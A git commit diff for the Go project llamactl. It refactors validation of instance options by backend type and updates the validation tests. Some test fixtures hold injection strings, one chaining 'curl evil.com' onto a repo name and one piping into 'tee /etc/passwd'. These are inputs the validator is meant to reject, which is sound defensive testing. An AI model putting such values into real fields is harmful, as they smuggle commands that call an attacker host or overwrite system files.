Refactor instance management to support backend types and options

This commit is contained in:
2025-09-01 21:59:18 +02:00
parent 9a4dafeee8
commit d9542ba117
13 changed files with 427 additions and 254 deletions

View File

@@ -2,6 +2,7 @@ package validation
import (
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/instance"
"reflect"
"regexp"
@@ -33,20 +34,35 @@ func validateStringForInjection(value string) error {
return nil
}
// ValidateInstanceOptions performs minimal security validation
// ValidateInstanceOptions performs validation based on backend type
func ValidateInstanceOptions(options *instance.CreateInstanceOptions) error {
if options == nil {
return ValidationError(fmt.Errorf("options cannot be nil"))
}
// Validate based on backend type
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
return validateLlamaCppOptions(options)
default:
return ValidationError(fmt.Errorf("unsupported backend type: %s", options.BackendType))
}
}
// validateLlamaCppOptions validates llama.cpp specific options
func validateLlamaCppOptions(options *instance.CreateInstanceOptions) error {
if options.LlamaServerOptions == nil {
return ValidationError(fmt.Errorf("llama server options cannot be nil for llama.cpp backend"))
}
// Use reflection to check all string fields for injection patterns
if err := validateStructStrings(&options.LlamaServerOptions, ""); err != nil {
if err := validateStructStrings(options.LlamaServerOptions, ""); err != nil {
return err
}
// Basic network validation - only check for reasonable ranges
if options.Port < 0 || options.Port > 65535 {
return ValidationError(fmt.Errorf("invalid port range"))
// Basic network validation for port
if options.LlamaServerOptions.Port < 0 || options.LlamaServerOptions.Port > 65535 {
return ValidationError(fmt.Errorf("invalid port range: %d", options.LlamaServerOptions.Port))
}
return nil

View File

@@ -1,6 +1,7 @@
package validation_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
@@ -83,7 +84,8 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Port: tt.port,
},
}
@@ -136,7 +138,8 @@ func TestValidateInstanceOptions_StringInjection(t *testing.T) {
t.Run(tt.name, func(t *testing.T) {
// Test with Model field (string field)
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: tt.value,
},
}
@@ -173,7 +176,8 @@ func TestValidateInstanceOptions_ArrayInjection(t *testing.T) {
t.Run(tt.name, func(t *testing.T) {
// Test with Lora field (array field)
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Lora: tt.array,
},
}
@@ -196,7 +200,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
{
name: "injection in model field",
options: &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "safe.gguf",
HFRepo: "microsoft/model; curl evil.com",
},
@@ -206,7 +211,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
{
name: "injection in log file",
options: &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "safe.gguf",
LogFile: "/tmp/log.txt | tee /etc/passwd",
},
@@ -216,7 +222,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
{
name: "all safe fields",
options: &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
HFRepo: "microsoft/DialoGPT-medium",
LogFile: "/tmp/llama.log",
@@ -244,7 +251,8 @@ func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
AutoRestart: testutil.BoolPtr(true),
MaxRestarts: testutil.IntPtr(5),
RestartDelay: testutil.IntPtr(10),
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Port: 8080,
GPULayers: 32,
CtxSize: 4096,